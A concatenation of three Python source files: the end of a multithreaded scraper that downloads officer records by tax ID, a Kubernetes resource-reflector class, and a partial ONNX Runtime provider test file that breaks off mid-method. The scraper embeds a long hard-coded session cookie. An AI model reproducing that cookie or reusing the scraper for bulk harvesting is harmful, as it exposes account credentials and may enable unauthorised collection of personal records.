    headers = {'Content-Type': 'application/json','Cookie': 'user=Dl03--EYI2nawt3xnyi8U-zVa8MFSosL8CIh-v9M-9hDSVxFNeD4mkvoH1RVEzBIZkHau5xp57PiqDp6EHzKzHbywKfQ8PzHFAT8bhloKh0zQFqPC1OO1Uxn4QnxfX_N6wmmZbTaGkZQOFgYxcMYfBLv6ZutVAukPV6CzbxzljqdXeYYbQxpG-PXT-Wy1GITH3h1WjwR4oyg21iHzq04Nhykhbf3IkDGWXYIPgmxK8ARs0WtdoYnSOyXNIMvjT99qCKOKA83Idg1a-lLk-8HGV-p3C8ilYPVfGtkY2kJPuN9K_bNOYg7DSm0CPbRShOrg46eRvz-n5pz9oR8jtignx1c49gG4ER-OKxssLQA07_zBT5RaqYt58-r4lMe790i; BNI_persistence=fQZHNVs5szWnatWt8bmuAJzA1b_wBc4-MEyNgCTaFVZXK0PKH-jBaxkrS6oaSZ0Bz_eln6qu8a74Wj0uSvRC7g=='}
    r = requests.post(OFFICER_URL,data =data, headers=headers)
    # The endpoint returns a one-element list; Items holds the summary rows.
    response_json = r.json()[0]
    data_save = response_json['Items']
    name = response_json['Label'].strip()
    data_save.append({'name':name})
    # Folder name convention: "<tax_id>_<officer name>".
    folder_name = tax_id+'_'+name
    make_folder(SAVE_DICTIONARY+folder_name)
    save_json_to_file(data_save,SAVE_DICTIONARY+folder_name+'/'+folder_name+'_'+'summary')
    # Throttle: don't let more than ~100 downloader threads run at once.
    while threading.active_count() >100:
        print("waiting")
        time.sleep(10)
    # One detail-report download thread per filter id.
    for filter_num in LIST_OF_FILTERS:
        #p1 = multiprocessing.Process(target=save_officer_detail_record_to_file_with_tax_id_and_filter_number, args=(tax_id,filter_num,folder_name))
        t = threading.Thread(target=save_officer_detail_record_to_file_with_tax_id_and_filter_number, args=(tax_id,filter_num,folder_name))
        t.start()
    #all_processes = [multiprocessing.Process(target=save_officer_detail_record_to_file_with_tax_id_and_filter_number, args=(tax_id,filter_num,folder_name)) for filter_num in LIST_OF_FILTERS]
    #for p in all_processes:
    #    p.start()
    #for p in all_processes:
    #    p.join()
    #save_officer_detail_record_to_file_with_tax_id_and_filter_number(tax_id,filter_num,folder_name)
def save_officer_detail_record_to_file_with_tax_id_and_filter_number(tax_id, filter_num,folder_name):
    """Fetch one detail report (*filter_num*) for *tax_id* and save it.

    Empty responses are counted in the global ``error_iter`` and reported.

    Fix: ``error_iter`` was never initialized at module level, so the first
    empty response raised NameError inside a worker thread (and the thread
    died silently); it is now lazily initialized to 0 here.
    NOTE(review): the file is written next to the CWD as
    "<folder_name><tax_id>filter_<n>" — the commented-out line shows the
    per-officer-folder path that was presumably intended; confirm.
    """
    global error_iter
    if 'error_iter' not in globals():
        error_iter = 0
    url = DETAIL_URL+str(filter_num)+'/datasource/list'
    # Server-side filter selecting the officer by tax ID.
    data = '{"filters":[{"key":"@TAXID","label":"TAXID","values":["'+str(tax_id)+'"]}]}'
    # Hard-coded session cookie — must be refreshed when it expires.
    headers = {'Content-Type': 'application/json','Cookie': 'user=Dl03--EYI2nawt3xnyi8U-zVa8MFSosL8CIh-v9M-9hDSVxFNeD4mkvoH1RVEzBIZkHau5xp57PiqDp6EHzKzHbywKfQ8PzHFAT8bhloKh0zQFqPC1OO1Uxn4QnxfX_N6wmmZbTaGkZQOFgYxcMYfBLv6ZutVAukPV6CzbxzljqdXeYYbQxpG-PXT-Wy1GITH3h1WjwR4oyg21iHzq04Nhykhbf3IkDGWXYIPgmxK8ARs0WtdoYnSOyXNIMvjT99qCKOKA83Idg1a-lLk-8HGV-p3C8ilYPVfGtkY2kJPuN9K_bNOYg7DSm0CPbRShOrg46eRvz-n5pz9oR8jtignx1c49gG4ER-OKxssLQA07_zBT5RaqYt58-r4lMe790i; BNI_persistence=fQZHNVs5szWnatWt8bmuAJzA1b_wBc4-MEyNgCTaFVZXK0PKH-jBaxkrS6oaSZ0Bz_eln6qu8a74Wj0uSvRC7g=='}
    r = requests.post(url,data =data, headers=headers)
    response_json = r.json()
    if len(response_json)>0:
        # save_json_to_file(response_json,SAVE_DICTIONARY+folder_name+'/filter_'+str(filter_num))
        save_json_to_file(response_json,folder_name+tax_id+'filter_'+str(filter_num))
    else:
        print("Tax Id "+tax_id+' missing summary '+str(error_iter))
        error_iter = error_iter +1
def save_officer_info_with_list_tax_ids(tax_ids):
    """Download and save a record for each tax ID in *tax_ids*.

    NOTE(review): the ``i > 1950`` check skips already-processed IDs — it
    looks like a manual resume point from an interrupted run; confirm (or
    parameterize) before reusing.

    Fix: the bare ``except:`` also swallowed KeyboardInterrupt/SystemExit,
    making the long-running loop impossible to stop cleanly; narrowed to
    ``Exception``. The unused ``folder_path`` local was dropped (the callee
    returns nothing).
    """
    for i, tax_id in enumerate(tax_ids):
        if i > 1950:
            try:
                save_officer_record_to_file_with_tax_id_return_folder_path(tax_id)
                print("i "+str(i))
            except Exception:
                # Best-effort: report the failure and keep going.
                print("failed i"+str(i))
def save_json_to_file(json_to_save, file_path_to_save):
    """Serialize *json_to_save* as JSON into *file_path_to_save*."""
    serialized = json.dumps(json_to_save)
    with open(file_path_to_save, 'w') as handle:
        handle.write(serialized)
def save_tax_ids_to_file():
    """Persist every cached tax ID to SAVE_TAX_ID_LIST as a JSON array."""
    collected_ids = list(tax_id_dict.keys())
    with open(SAVE_TAX_ID_LIST, 'w') as handle:
        json.dump(collected_ids, handle)
def load_tax_ids_from_file():
    """Load and return the JSON array of tax IDs cached in SAVE_TAX_ID_LIST."""
    with open(SAVE_TAX_ID_LIST, 'r') as handle:
        contents = handle.read()
    return json.loads(contents)
def get_folders_in_path(path_to_search):
    """Return the names of all entries directly inside *path_to_search*.

    NOTE(review): despite the name this lists files too, not just folders.
    """
    return os.listdir(path_to_search)
def file_exists(file_to_check):
    """Stub: always reports the file as missing.

    NOTE(review): deliberately returns False (so any caller would always
    re-download) — confirm before relying on it as a real existence check.
    """
    return False
def temp_iterate():
    """One-off backfill: re-download the filter-9 detail report for every
    officer folder already present under ./data-folders/."""
    # Iterate through each saved officer folder and refetch one filter.
    list_of_folders = get_folders_in_path('./data-folders/')
    for officer_folder in list_of_folders:
        # Folder names follow the "<tax_id>_<officer name>" convention.
        tax_id = officer_folder.split('_')[0]
        # Throttle: don't let more than ~100 downloader threads run at once.
        while threading.active_count() >100:
            print("waiting")
            time.sleep(10)
        t = threading.Thread(target=save_officer_detail_record_to_file_with_tax_id_and_filter_number, args=(tax_id,9,officer_folder))
        t.start()
# Script entry point. The roster-scrape and cache-save steps are commented
# out because the tax-ID list has already been fetched and cached on disk;
# the run resumes from the cached list.
if __name__ == '__main__':
    #query_list_url_get_taxids(1,100)
    #save_tax_ids_to_file()
    tax_id_list = load_tax_ids_from_file()
    save_officer_info_with_list_tax_ids(tax_id_list)
|
reflector.py | # specifically use concurrent.futures for threadsafety
# asyncio Futures cannot be used across threads
import json
import threading
import time
from concurrent.futures import Future
from functools import partial
from kubernetes import config
from kubernetes import watch
from traitlets import Any
from traitlets import Bool
from traitlets import Dict
from traitlets import Int
from traitlets import Unicode
from traitlets.config import LoggingConfigurable
from urllib3.exceptions import ReadTimeoutError
from .clients import shared_client
# This is kubernetes client implementation specific, but we need to know
# whether it was a network or watch timeout.
class ResourceReflector(LoggingConfigurable):
    """Base class for keeping a local up-to-date copy of a set of
    kubernetes resources.
    Must be subclassed once per kind of resource that needs watching.
    """

    labels = Dict(
        {},
        config=True,
        help="""
        Labels to reflect onto local cache
        """,
    )
    fields = Dict(
        {},
        config=True,
        help="""
        Fields to restrict the reflected objects
        """,
    )
    resources = Dict(
        {},
        help="""
        Dictionary of resource names to the appropriate resource objects.
        This can be accessed across threads safely.
        """,
    )
    kind = Unicode(
        'resource',
        help="""
        Human readable name for kind of object we're watching for.
        Used for diagnostic messages.
        """,
    )
    omit_namespace = Bool(
        False,
        config=True,
        help="""
        Set this to true if the reflector is to operate across
        multiple namespaces.
        """,
    )
    namespace = Unicode(
        None,
        allow_none=True,
        help="""
        Namespace to watch for resources in; leave at 'None' for
        multi-namespace reflectors.
        """,
    )
    list_method_name = Unicode(
        "",
        help="""
        Name of function (on apigroup respresented by
        `api_group_name`) that is to be called to list resources.
        This will be passed a a label selector.
        If self.omit_namespace is False you want something of the form
        list_namespaced_<resource> - for example,
        `list_namespaced_pod` will give you a PodReflector. It will
        take its namespace from self.namespace (which therefore should
        not be None).
        If self.omit_namespace is True, you want
        list_<resource>_for_all_namespaces.
        This must be set by a subclass.
        It is not necessary to set it for pod or event reflectors, because
        __init__ will figure it out. If you create your own reflector
        subclass you probably want to add the logic to choose the method
        name to that class's __init__().
        """,
    )
    api_group_name = Unicode(
        'CoreV1Api',
        help="""
        Name of class that represents the apigroup on which
        `list_method_name` is to be found.
        Defaults to CoreV1Api, which has everything in the 'core' API group. If you want to watch Ingresses,
        for example, you would have to use ExtensionsV1beta1Api
        """,
    )
    request_timeout = Int(
        60,
        config=True,
        help="""
        Network timeout for kubernetes watch.
        Trigger watch reconnect when a given request is taking too long,
        which can indicate network issues.
        """,
    )
    timeout_seconds = Int(
        10,
        config=True,
        help="""
        Timeout for kubernetes watch.
        Trigger watch reconnect when no watch event has been received.
        This will cause a full reload of the currently existing resources
        from the API server.
        """,
    )
    restart_seconds = Int(
        30,
        config=True,
        help="""
        Maximum time before restarting a watch.
        The watch will be restarted at least this often,
        even if events are still arriving.
        Avoids trusting kubernetes watch to yield all events,
        which seems to not be a safe assumption.
        """,
    )
    on_failure = Any(help="""Function to be called when the reflector gives up.""")

    def __init__(self, *args, **kwargs):
        """Set up selectors, resolve the list method, and start watching."""
        super().__init__(*args, **kwargs)
        # client configuration for kubernetes has already taken place
        self.api = shared_client(self.api_group_name)
        # FIXME: Protect against malicious labels?
        self.label_selector = ','.join(
            ['{}={}'.format(k, v) for k, v in self.labels.items()]
        )
        self.field_selector = ','.join(
            ['{}={}'.format(k, v) for k, v in self.fields.items()]
        )
        # concurrent.futures.Future (not asyncio) so it can be resolved from
        # the watch thread and awaited from elsewhere.
        self.first_load_future = Future()
        self._stop_event = threading.Event()
        # Make sure that we know kind, whether we should omit the
        # namespace, and what our list_method_name is. For the things
        # we already know about, we can derive list_method_name from
        # those two things. New reflector types should also update
        # their __init__() methods to derive list_method_name, but you
        # could just set it directly in the subclass.
        if not self.list_method_name:
            plural_to_singular = {
                "endpoints": "endpoints",
                "events": "event",
                "ingresses": "ingress",
                "pods": "pod",
                "services": "service",
            }
            if self.kind in plural_to_singular:
                if self.omit_namespace:
                    self.list_method_name = (
                        f"list_{plural_to_singular[self.kind]}_for_all_namespaces"
                    )
                else:
                    self.list_method_name = (
                        f"list_namespaced_{plural_to_singular[self.kind]}"
                    )
        # Make sure we have the required values.
        if not self.kind:
            raise RuntimeError("Reflector kind must be set!")
        if not self.list_method_name:
            raise RuntimeError("Reflector list_method_name must be set!")
        # Begin reflecting immediately (blocking initial list + watch thread).
        self.start()

    def __del__(self):
        # Best-effort: signal the watch thread to stop when garbage-collected.
        self.stop()

    def _list_and_update(self):
        """
        Update current list of resources by doing a full fetch.
        Overwrites all current resource info.
        Returns the list's resourceVersion so a watch can resume from it.
        """
        initial_resources = None
        kwargs = dict(
            label_selector=self.label_selector,
            field_selector=self.field_selector,
            _request_timeout=self.request_timeout,
            # _preload_content=False: get the raw response and parse the JSON
            # ourselves instead of letting the client build model objects.
            _preload_content=False,
        )
        if not self.omit_namespace:
            kwargs["namespace"] = self.namespace
        initial_resources = getattr(self.api, self.list_method_name)(**kwargs)
        # This is an atomic operation on the dictionary!
        initial_resources = json.loads(initial_resources.read())
        # Keyed by "namespace/name" to stay unique across namespaces.
        self.resources = {
            f'{p["metadata"]["namespace"]}/{p["metadata"]["name"]}': p
            for p in initial_resources["items"]
        }
        # return the resource version so we can hook up a watch
        return initial_resources["metadata"]["resourceVersion"]

    def _watch_and_update(self):
        """
        Keeps the current list of resources up-to-date
        This method is to be run not on the main thread!
        We first fetch the list of current resources, and store that. Then we
        register to be notified of changes to those resources, and keep our
        local store up-to-date based on these notifications.
        We also perform exponential backoff, giving up after we hit 32s
        wait time. This should protect against network connections dropping
        and intermittent unavailability of the api-server. Every time we
        recover from an exception we also do a full fetch, to pick up
        changes that might've been missed in the time we were not doing
        a watch.
        Note that we're playing a bit with fire here, by updating a dictionary
        in this thread while it is probably being read in another thread
        without using locks! However, dictionary access itself is atomic,
        and as long as we don't try to mutate them (do a 'fetch / modify /
        update' cycle on them), we should be ok!
        """
        selectors = []
        log_name = ""
        if self.label_selector:
            selectors.append("label selector=%r" % self.label_selector)
        if self.field_selector:
            selectors.append("field selector=%r" % self.field_selector)
        log_selector = ', '.join(selectors)
        # Backoff delay; reset to 0.1 whenever an event arrives successfully.
        cur_delay = 0.1
        if self.omit_namespace:
            ns_str = "all namespaces"
        else:
            ns_str = "namespace {}".format(self.namespace)
        self.log.info(
            "watching for %s with %s in %s",
            self.kind,
            log_selector,
            ns_str,
        )
        while True:
            self.log.debug("Connecting %s watcher", self.kind)
            start = time.monotonic()
            w = watch.Watch()
            try:
                # Full relist first; the watch resumes from its resourceVersion.
                resource_version = self._list_and_update()
                if not self.first_load_future.done():
                    # signal that we've loaded our initial data
                    self.first_load_future.set_result(None)
                watch_args = {
                    "label_selector": self.label_selector,
                    "field_selector": self.field_selector,
                    "resource_version": resource_version,
                }
                if not self.omit_namespace:
                    watch_args["namespace"] = self.namespace
                if self.request_timeout:
                    # set network receive timeout
                    watch_args['_request_timeout'] = self.request_timeout
                if self.timeout_seconds:
                    # set watch timeout
                    watch_args['timeout_seconds'] = self.timeout_seconds
                method = partial(
                    getattr(self.api, self.list_method_name), _preload_content=False
                )
                # in case of timeout_seconds, the w.stream just exits (no exception thrown)
                # -> we stop the watcher and start a new one
                for watch_event in w.stream(method, **watch_args):
                    # Remember that these events are k8s api related WatchEvents
                    # objects, not k8s Event or Pod representations, they will
                    # reside in the WatchEvent's object field depending on what
                    # kind of resource is watched.
                    #
                    # ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#watchevent-v1-meta
                    # ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#event-v1-core
                    cur_delay = 0.1
                    resource = watch_event['object']
                    ref_key = "{}/{}".format(
                        resource["metadata"]["namespace"], resource["metadata"]["name"]
                    )
                    if watch_event['type'] == 'DELETED':
                        # This is an atomic delete operation on the dictionary!
                        self.resources.pop(ref_key, None)
                    else:
                        # This is an atomic operation on the dictionary!
                        self.resources[ref_key] = resource
                    if self._stop_event.is_set():
                        self.log.info("%s watcher stopped", self.kind)
                        break
                    # Restart the watch periodically even while healthy.
                    watch_duration = time.monotonic() - start
                    if watch_duration >= self.restart_seconds:
                        self.log.debug(
                            "Restarting %s watcher after %i seconds",
                            self.kind,
                            watch_duration,
                        )
                        break
            except ReadTimeoutError:
                # network read time out, just continue and restart the watch
                # this could be due to a network problem or just low activity
                self.log.warning("Read timeout watching %s, reconnecting", self.kind)
                continue
            except Exception:
                # Exponential backoff; give up for good once the delay
                # exceeds 30s (i.e. the 32s step mentioned in the docstring).
                cur_delay = cur_delay * 2
                if cur_delay > 30:
                    self.log.exception("Watching resources never recovered, giving up")
                    if self.on_failure:
                        self.on_failure()
                    return
                self.log.exception(
                    "Error when watching resources, retrying in %ss", cur_delay
                )
                time.sleep(cur_delay)
                continue
            else:
                # no events on watch, reconnect
                self.log.debug("%s watcher timeout", self.kind)
            finally:
                w.stop()
                if self._stop_event.is_set():
                    self.log.info("%s watcher stopped", self.kind)
                    break
        self.log.warning("%s watcher finished", self.kind)

    def start(self):
        """
        Start the reflection process!
        We'll do a blocking read of all resources first, so that we don't
        race with any operations that are checking the state of the pod
        store - such as polls. This should be called only once at the
        start of program initialization (when the singleton is being created),
        and not afterwards!
        """
        if hasattr(self, 'watch_thread'):
            raise ValueError('Thread watching for resources is already running')
        self._list_and_update()
        self.watch_thread = threading.Thread(target=self._watch_and_update)
        # If the watch_thread is only thread left alive, exit app
        self.watch_thread.daemon = True
        self.watch_thread.start()

    def stop(self):
        # Ask the watch loop to exit at its next opportunity.
        self._stop_event.set()

    def stopped(self):
        # True once stop() has been requested.
        return self._stop_event.is_set()
class NamespacedResourceReflector(ResourceReflector):
    """
    Watches for resources in a particular namespace. The list_methods
    want both a method name and a namespace.
    """

    # Single-namespace variant: base class resolves the list method to
    # list_namespaced_<resource> and uses self.namespace.
    omit_namespace = False
class MultiNamespaceResourceReflector(ResourceReflector):
    """
    Watches for resources across all namespaces. The list_methods
    want only a method name. Note that this requires the service account
    to be significantly more powerful, since it must be bound to ClusterRoles
    rather than just Roles, and therefore this is inherently more
    dangerous.
    """

    # Cluster-wide variant: base class resolves the list method to
    # list_<resource>_for_all_namespaces; self.namespace stays None.
    omit_namespace = True
|
onnxruntime_test_python.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import gc
import numpy as np
import onnxruntime as onnxrt
import os
import platform
import sys
import threading
import unittest
from helper import get_name
from onnxruntime.capi.onnxruntime_pybind11_state import Fail
# handle change from python 3.8 and on where loading a dll from the current
# directory needs to be explicitly allowed.
# Fix: tuple comparison instead of separate major/minor checks, which would
# misbehave for any hypothetical major bump (e.g. 4.0 has minor < 8).
if platform.system() == 'Windows' and sys.version_info >= (3, 8):
    os.add_dll_directory(os.getcwd())

# All execution providers available in this build (default priority order).
# Fix: identity comprehension replaced with a plain list() copy.
available_providers = list(onnxrt.get_available_providers())

# TVM EP doesn't support:
# * calling Run() on different threads using the same session object
# * symbolic inputs
# * string inputs
# * byte type inputs
# * object type inputs
# * void type inputs
# * SequenceConstruct operator
# * custom operators
# * testSequenceInsert
# * testSequenceLength
available_providers_without_tvm = [
    provider for provider in onnxrt.get_available_providers()
    if provider not in {'TvmExecutionProvider'}]
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testTvmImported(self):
if "TvmExecutionProvider" not in onnxrt.get_available_providers():
return
import tvm
self.assertTrue(tvm is not None)
    def testModelSerialization(self):
        """Creating a session with optimized_model_filepath set should write
        the optimized model file — unless the graph contains compiled nodes,
        in which case ORT raises Fail and the test tolerates exactly that."""
        try:
            so = onnxrt.SessionOptions()
            so.log_severity_level = 1
            so.logid = "TestModelSerialization"
            so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
            onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so, providers=['CPUExecutionProvider'])
            self.assertTrue(os.path.isfile(so.optimized_model_filepath))
        except Fail as onnxruntime_error:
            # Only the exact "compiled nodes" serialization failure is
            # acceptable; anything else is a real error and is re-raised.
            if str(onnxruntime_error) == "[ONNXRuntimeError] : 1 : FAIL : Unable to serialize model as it contains" \
                    " compiled nodes. Please disable any execution providers which generate compiled nodes.":
                pass
            else:
                raise onnxruntime_error
def testGetProviders(self):
self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers())
# get_all_providers() returns the default EP order from highest to lowest.
# CPUExecutionProvider should always be last.
self.assertTrue('CPUExecutionProvider' == onnxrt.get_all_providers()[-1])
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=onnxrt.get_available_providers())
self.assertTrue('CPUExecutionProvider' in sess.get_providers())
    def testEnablingAndDisablingTelemetry(self):
        """Toggle the global telemetry switch both ways; neither call may raise."""
        onnxrt.disable_telemetry_events()
        # no-op on non-Windows builds
        # may be no-op on certain Windows builds based on build configuration
        onnxrt.enable_telemetry_events()
def testSetProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CUDAExecutionProvider'])
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(['CPUExecutionProvider'])
# confirm only CPU Provider is registered now.
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
    def testSetProvidersWithOptions(self):
        """Exercise set_providers() with explicit provider-option dicts for the
        TensorRT and CUDA execution providers, including round-tripping of
        option values and rejection of invalid ones."""
        if 'TensorrtExecutionProvider' in onnxrt.get_available_providers():
            sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['TensorrtExecutionProvider'])
            self.assertIn('TensorrtExecutionProvider', sess.get_providers())
            # Every documented TensorRT option should be surfaced by get_provider_options().
            options = sess.get_provider_options()
            option = options['TensorrtExecutionProvider']
            self.assertIn('device_id', option)
            self.assertIn('trt_max_partition_iterations', option)
            self.assertIn('trt_min_subgraph_size', option)
            self.assertIn('trt_max_workspace_size', option)
            self.assertIn('trt_dump_subgraphs', option)
            self.assertIn('trt_engine_cache_enable', option)
            self.assertIn('trt_engine_cache_path', option)
            self.assertIn('trt_force_sequential_engine_build', option)
            # Derive new values from the currently reported ones.
            max_partition_iterations = option['trt_max_partition_iterations']
            new_max_partition_iterations = int(max_partition_iterations) + 1
            min_subgraph_size = option['trt_min_subgraph_size']
            new_min_subgraph_size = int(min_subgraph_size) + 1
            ori_max_workspace_size = option['trt_max_workspace_size']
            new_max_workspace_size = int(ori_max_workspace_size) // 2
            # Build a fresh option dict and push it back through set_providers().
            option = {}
            option['trt_max_partition_iterations'] = new_max_partition_iterations
            option['trt_min_subgraph_size'] = new_min_subgraph_size
            option['trt_max_workspace_size'] = new_max_workspace_size
            dump_subgraphs = "true"
            option['trt_dump_subgraphs'] = dump_subgraphs
            engine_cache_enable = "true"
            option['trt_engine_cache_enable'] = engine_cache_enable
            engine_cache_path = './engine_cache'
            option['trt_engine_cache_path'] = engine_cache_path
            force_sequential_engine_build = "true"
            option['trt_force_sequential_engine_build'] = force_sequential_engine_build
            sess.set_providers(['TensorrtExecutionProvider'], [option])
            # Values round-trip as strings; booleans come back as '1'/'0'.
            options = sess.get_provider_options()
            option = options['TensorrtExecutionProvider']
            self.assertEqual(option['trt_max_partition_iterations'], str(new_max_partition_iterations))
            self.assertEqual(option['trt_min_subgraph_size'], str(new_min_subgraph_size))
            self.assertEqual(option['trt_max_workspace_size'], str(new_max_workspace_size))
            self.assertEqual(option['trt_dump_subgraphs'], '1')
            self.assertEqual(option['trt_engine_cache_enable'], '1')
            self.assertEqual(option['trt_engine_cache_path'], str(engine_cache_path))
            self.assertEqual(option['trt_force_sequential_engine_build'], '1')
            # We currently disable following test code since that not all test machines/GPUs have nvidia int8 capability
            '''
            int8_use_native_calibration_table = "false"
            option['trt_int8_use_native_calibration_table'] = int8_use_native_calibration_table
            int8_enable = "true"
            option['trt_int8_enable'] = int8_enable
            calib_table_name = '/home/onnxruntime/table.flatbuffers' # this file is not existed
            option['trt_int8_calibration_table_name'] = calib_table_name
            with self.assertRaises(RuntimeError):
                sess.set_providers(['TensorrtExecutionProvider'], [option])
            '''
        if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
            # NOTE(review): these shadow/duplicate the module-level imports.
            import sys
            import ctypes
            CUDA_SUCCESS = 0

            def runBaseTest1():
                # Basic device_id handling: valid id, invalid id, multi-provider reset.
                sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CUDAExecutionProvider'])
                self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
                option1 = {'device_id': 0}
                sess.set_providers(['CUDAExecutionProvider'], [option1])
                self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
                option2 = {'device_id': -1}
                with self.assertRaises(RuntimeError):
                    sess.set_providers(['CUDAExecutionProvider'], [option2])
                sess.set_providers(['CUDAExecutionProvider', 'CPUExecutionProvider'], [option1, {}])
                self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())

            def runBaseTest2():
                sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CUDAExecutionProvider'])
                self.assertIn('CUDAExecutionProvider', sess.get_providers())
                # test get/set of "gpu_mem_limit" configuration.
                options = sess.get_provider_options()
                self.assertIn('CUDAExecutionProvider', options)
                option = options['CUDAExecutionProvider']
                self.assertIn('gpu_mem_limit', option)
                ori_mem_limit = option['gpu_mem_limit']
                new_mem_limit = int(ori_mem_limit) // 2
                option['gpu_mem_limit'] = new_mem_limit
                sess.set_providers(['CUDAExecutionProvider'], [option])
                options = sess.get_provider_options()
                self.assertEqual(options['CUDAExecutionProvider']['gpu_mem_limit'], str(new_mem_limit))
                # Restore the original limit and verify it round-trips too.
                option['gpu_mem_limit'] = ori_mem_limit
                sess.set_providers(['CUDAExecutionProvider'], [option])
                options = sess.get_provider_options()
                self.assertEqual(options['CUDAExecutionProvider']['gpu_mem_limit'], ori_mem_limit)

                def test_get_and_set_option_with_values(option_name, option_values):
                    # Set each candidate value and check it reads back as a string.
                    provider_options = sess.get_provider_options()
                    self.assertIn('CUDAExecutionProvider', provider_options)
                    # NOTE(review): this reads the stale outer `options` rather than the
                    # `provider_options` fetched on the line above — looks like a bug;
                    # it only works because the enclosing scope queried the same session.
                    cuda_options = options['CUDAExecutionProvider']
                    self.assertIn(option_name, cuda_options)
                    for option_value in option_values:
                        cuda_options[option_name] = option_value
                        sess.set_providers(['CUDAExecutionProvider'], [cuda_options])
                        new_provider_options = sess.get_provider_options()
                        self.assertEqual(
                            new_provider_options.get('CUDAExecutionProvider', {}).get(option_name),
                            str(option_value))

                test_get_and_set_option_with_values(
                    'arena_extend_strategy', ['kNextPowerOfTwo', 'kSameAsRequested'])
                test_get_and_set_option_with_values(
                    'cudnn_conv_algo_search', ["DEFAULT", "EXHAUSTIVE", "HEURISTIC"])
                test_get_and_set_option_with_values(
                    'do_copy_in_default_stream', [0, 1])
                # External allocator entry points (function pointers as strings).
                option['gpu_external_alloc'] = '0'
                option['gpu_external_free'] = '0'
                option['gpu_external_empty_cache'] = '0'
                sess.set_providers(['CUDAExecutionProvider'], [option])
                options = sess.get_provider_options()
                self.assertEqual(options['CUDAExecutionProvider']['gpu_external_alloc'], '0')
                self.assertEqual(options['CUDAExecutionProvider']['gpu_external_free'], '0')
                self.assertEqual(options['CUDAExecutionProvider']['gpu_external_empty_cache'], '0')
                #
                # Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
                # so run them last. Each set_providers call will attempt to re-create a session, so it's
                # fine for a test that fails to run immediately after another one that fails.
                # Alternatively a valid call to set_providers could be used to recreate the underlying session
                # after a failed call.
                #
                option['arena_extend_strategy'] = 'wrong_value'
                with self.assertRaises(RuntimeError):
                    sess.set_providers(['CUDAExecutionProvider'], [option])
                option['gpu_mem_limit'] = -1024
                with self.assertRaises(RuntimeError):
                    sess.set_providers(['CUDAExecutionProvider'], [option])
                option['gpu_mem_limit'] = 1024.1024
                with self.assertRaises(RuntimeError):
                    sess.set_providers(['CUDAExecutionProvider'], [option])
                option['gpu_mem_limit'] = 'wrong_value'
                with self.assertRaises(RuntimeError):
                    sess.set_providers(['CUDAExecutionProvider'], [option])

            def getCudaDeviceCount():
                # Query the driver API directly via ctypes; returns -1 on failure.
                import ctypes
                num_device = ctypes.c_int()
                result = ctypes.c_int()
                error_str = ctypes.c_char_p()
                result = cuda.cuInit(0)
                result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
                if result != CUDA_SUCCESS:
                    cuda.cuGetErrorString(result, ctypes.byref(error_str))
                    print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
                    return -1
                return num_device.value

            def setDeviceIdTest(i):
                # Setting device_id=i must make CUDA's current context use device i.
                import ctypes
                import onnxruntime as onnxrt
                device = ctypes.c_int()
                result = ctypes.c_int()
                error_str = ctypes.c_char_p()
                sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
                option = {'device_id': i}
                sess.set_providers(['CUDAExecutionProvider'], [option])
                self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
                result = cuda.cuCtxGetDevice(ctypes.byref(device))
                if result != CUDA_SUCCESS:
                    cuda.cuGetErrorString(result, ctypes.byref(error_str))
                    print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
                self.assertEqual(result, CUDA_SUCCESS)
                self.assertEqual(i, device.value)

            def runAdvancedTest():
                num_device = getCudaDeviceCount()
                if num_device < 0:
                    return
                # Configure session to be ready to run on all available cuda devices
                for i in range(num_device):
                    setDeviceIdTest(i)
                sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
                # configure session with invalid option values and that should fail
                with self.assertRaises(RuntimeError):
                    option = {'device_id': num_device}
                    sess.set_providers(['CUDAExecutionProvider'], [option])
                    option = {'device_id': 'invalid_value'}
                    sess.set_providers(['CUDAExecutionProvider'], [option])
                # configure session with invalid option should fail
                with self.assertRaises(RuntimeError):
                    option = {'invalid_option': 123}
                    sess.set_providers(['CUDAExecutionProvider'], [option])

            # Try to load the CUDA driver library; run the advanced (ctypes-based)
            # tests only when it is present.
            libnames = ('libcuda.so', 'libcuda.dylib', 'cuda.dll')
            for libname in libnames:
                try:
                    cuda = ctypes.CDLL(libname)
                    runBaseTest1()
                    runBaseTest2()
                    runAdvancedTest()
                except OSError:
                    continue
                else:
                    break
            else:
                # for-else: no driver library could be loaded; run the base tests only.
                runBaseTest1()
                runBaseTest2()
                # raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
with self.assertRaises(RuntimeError) as context:
